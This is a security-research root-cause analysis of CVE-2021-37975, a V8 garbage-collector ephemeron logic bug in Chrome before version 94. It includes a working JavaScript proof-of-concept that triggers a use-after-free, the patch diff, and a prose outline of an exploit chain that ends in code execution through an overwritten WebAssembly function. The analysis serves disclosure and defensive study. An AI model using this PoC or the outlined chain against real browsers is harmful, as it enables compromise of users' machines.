CVE-2021-37975: Chrome v8 garbage collector logic bug causing live objects to be collected

Man Yue Mo, GitHub Security Lab

The Basics

Disclosure or Patch Date: 30 September 2021

Product: Google Chrome

Advisory: https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_30.html

Affected Versions: pre 94.0.4606.71

First Patched Version: 94.0.4606.71

Issue/Bug Report: https://bugs.chromium.org/p/chromium/issues/detail?id=1252918

Patch CL: https://chromium.googlesource.com/v8/v8.git/+/1054ee7f349d6be22e9518cf9b794b206d0e5818

Bug-Introducing CL: N/A

Reporter(s): Anonymous

The Code

Proof-of-concept:

var initKey = {init : 1};
var level = 4;
var map1 = new WeakMap();

function hideWeakMap(map, level, initKey) {
  let prevMap = map;
  let prevKey = initKey;
  for (let i = 0; i < level; i++) {
    let thisMap = new WeakMap();
    prevMap.set(prevKey, thisMap);
    let thisKey = {'h' : i};
    thisMap.set(prevKey, thisKey);
    prevMap = thisMap;
    prevKey = thisKey;
    if (i == level - 1) {
      let retMap = new WeakMap();
      map.set(thisKey, retMap);
      return thisKey;
    }
  }
}

function getHiddenKey(map, level, initKey) {
  let prevMap = map;
  let prevKey = initKey;
  for (let i = 0; i < level; i++) {
    let thisMap = prevMap.get(prevKey);
    let thisKey = thisMap.get(prevKey);
    prevMap = thisMap;
    prevKey = thisKey;
    if (i == level - 1) {
      return thisKey;
    }
  }
}

function setUpWeakMap(map) {
  let hk = hideWeakMap(map, level, initKey);
  let hiddenMap = map.get(hk);
  let map7 = new WeakMap();
  let map8 = new WeakMap();
  let k5 = {k5 : 1};
  let map5 = new WeakMap();
  let k7 = {k7 : 1};
  let k9 = {k9 : 1};
  let k8 = {k8 : 1};
  let v9 = {};
  map.set(k7, map7);
  map.set(k9, v9);
  hiddenMap.set(k5, map5);
  hiddenMap.set(hk, k5);
  map5.set(hk, k7);
  map7.set(k8, map8);
  map7.set(k7, k8);
  map8.set(k8,k9);
  
}

function main() {
    setUpWeakMap(map1);

    new ArrayBuffer(0x7fe00000);
    let hiddenKey = getHiddenKey(map1, level, initKey);
    let hiddenMap = map1.get(hiddenKey);
    let k7 = hiddenMap.get(hiddenMap.get(hiddenKey)).get(hiddenKey);
    let k8 = map1.get(k7).get(k7);
    let map8 = map1.get(k7).get(k8);

    console.log(map1.get(map8.get(k8)));
}

while (true) {
  try {
    main();
  } catch (err) {}
}

Exploit sample: N/A

Did you have access to the exploit sample when doing the analysis? N/A

The Vulnerability

Bug class: Logic bug, but the result is use-after-free

Vulnerability details: When handling ephemerons (WeakMap, WeakSet etc.), a logic bug in the v8 garbage collector means that live objects may remain unmarked and be collected, leading to use-after-free.

Ephemerons (key-value pairs in WeakMap and WeakSet) are weak reference objects whose liveliness can only be determined after all other objects are marked by the garbage collector. In the v8 garbage collector, ephemerons are first marked using an iterative algorithm in ProcessEphemeronMarking. The algorithm roughly consists of three stages in each iteration:

bool MarkCompactCollector::ProcessEphemerons() {
  Ephemeron ephemeron;
  bool ephemeron_marked = false;

  // Drain current_ephemerons and push ephemerons where key and value are still
  // unreachable into next_ephemerons.
  while (weak_objects_.current_ephemerons.Pop(kMainThreadTask, &ephemeron)) {   //<----- 1.
    if (ProcessEphemeron(ephemeron.key, ephemeron.value)) {
      ephemeron_marked = true;
    }
  }

  // Drain marking worklist and push discovered ephemerons into
  // discovered_ephemerons.
  DrainMarkingWorklist();                                                      //<------ 2.

  // Drain discovered_ephemerons (filled in the drain MarkingWorklist-phase
  // before) and push ephemerons where key and value are still unreachable into
  // next_ephemerons.
  while (weak_objects_.discovered_ephemerons.Pop(kMainThreadTask, &ephemeron)) {//<----- 3.
    if (ProcessEphemeron(ephemeron.key, ephemeron.value)) {
      ephemeron_marked = true;
    }
  }

  // Flush local ephemerons for main task to global pool.
  weak_objects_.ephemeron_hash_tables.FlushToGlobal(kMainThreadTask);
  weak_objects_.next_ephemerons.FlushToGlobal(kMainThreadTask);

  return ephemeron_marked;
}

In the above, 1. will process the ephemerons that have been discovered so far, and pushes values whose keys are marked alive into a worklist. In 2., the worklist is processed and additional ephemerons maybe discovered (for example, if the worklist contains a WeakMap, then its entries may become newly discovered ephemerons). So in 3., these newly discovered ephemerons are processed and additional objects may be pushed to the worklist. The iteration continues until no more new objects are added to the worklist by 1. or 3. (because new objects in the worklist represents newly discovered live objects, and these need to be marked to avoid them getting collected).

However, the objects in the worklist in stage 2. may hold strong references to previously unreachable ephemerons in current_ephemerons that are processed in stage 1. If this happens, then some ephemerons in current_ephemerons may turn out to be alive when the iteration exits. In this case, these ephemerons will remain unmarked. This will lead to such ephemerons being collected while still alive.

Patch analysis:

The patch contains some refactoring, but the crucial part to fixing this bug is the following change:

diff --git a/src/heap/mark-compact.cc b/src/heap/mark-compact.cc
index 85e9618..dae343c 100644
--- a/src/heap/mark-compact.cc
+++ b/src/heap/mark-compact.cc
...
 bool MarkCompactCollector::ProcessEphemerons() {
   Ephemeron ephemeron;
 
   // Drain marking worklist and push discovered ephemerons into
   // discovered_ephemerons.
-  DrainMarkingWorklist();
+  size_t objects_processed;
+  std::tie(std::ignore, objects_processed) = ProcessMarkingWorklist(0);
+
+  // As soon as a single object was processed and potentially marked another
+  // object we need another iteration. Otherwise we might miss to apply
+  // ephemeron semantics on it.
+  if (objects_processed > 0) another_ephemeron_iteration = true;

As well as similar changes in concurrent-marking.cc. After the patch, the iteration will continue if any object in the worklist is processed, making sure that any existing ephemerons that got marked are processed in the next iteration. This prevents such ephemerons from being unmarked and collected.

Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.):

The PoC to trigger the bug is sufficiently complex. There is also some randomness involves in trigger the bug, and concurrent marking also cause the PoC to be significantly more complex. While concurrent marking and other randomness involved can be turned off using the --predictable flag, it may actually cause the PoC to not trigger at all (due to the specific ordering of the entries in the WeakMap that is required to trigger the bug, which means that, if the order is fixed by removing the randomness, then the WeakMap constructed in the PoC may always have the wrong order, as oppose to being sometimes right and sometimes wrong due to randomness), so it seems that the --predictable flag may not make the PoC any simpler either. Base on this, I believe this bug may be easier to find via manual auditing. By going through the logic of the garbage collector, and also realizing the complication that ephemerons introduced and focus on this specific part of the code, it may be possible to identify the problem, at the very least, as a functional/logic bug that requires further investigation.

(Historical/present/future) context of bug:

The bug seems to be in a very specific part of the garbage collector. I personally do not know of many security bugs in that is in the logic of the garbage collector.

The Exploit

(The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are defined here.)

Exploit strategy (or strategies):

The proof-of-concept included causes a use-after-free for an object of choice (v9 in the proof-of-concept). The simplest way to exploit the vulnerability is probably to cause a use-after-free in a TypedArray/ArrayBuffer and follow the exploit strategy in Operation Wizard Opium (See also The Journey from exploiting PartitionAlloc to escaping the sandbox: Chromium Fullchain - 0CTF 2020) to corrupt metadata in PartitionAlloc. I also have written an article with a different exploit strategy that uses a JSArray as the use-after-free object.

Exploit flow:

The standard way to exploit this is probably to first cause a use-after-free in a TypedArray/ArrayBuffer, and then use it to corrupt metadata in PartitionAlloc. From there, arbitrary read and write can be obtained and then standard v8 technique can be followed by overwriting the body of a WebAssembly function, which is stored in an RWX region. Calling the WASM function then leads to arbitrary code execution.

Another way to exploit the use-after-free is to use large JSArray to cause type confusion between double and objects. After that, standard v8 type confusion exploit techniques can be applied.

Known cases of the same exploit flow: The TypedArray/ArrayBuffer exploit flow follows the exploit of CVE-2019-13720.

Part of an exploit chain?

This is unclear to me as I do not have any context information other than what is publicly available.

The Next Steps

Variant analysis

Areas/approach for variant analysis (and why):

While this is a bug in a very specific area in the garbage collector, there are some other areas where variants may exist:

Handling of ephemerons of in other garbage collectors, such as the oilpan. The bug 1252878 appears to be the same ephemeron handling problem in oilpan.
Other objects that require special treatment in the garbage collector.

Found variants: The bug 1252878 (patch) appears to be a variant found and fixed by the developers at around the same time as this bug is fixed. It was fixed in 94.0.4606.81 as CVE-2021-37977 and was not known to be exploited in the wild.

Structural improvements

What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.?

Ideas to kill the bug class:

Ideas to mitigate the exploit flow:

Other potential improvements:

0-day detection methods

What are potential detection methods for similar 0-days? Meaning are there any ideas of how this exploit or similar exploits could be detected as a 0-day?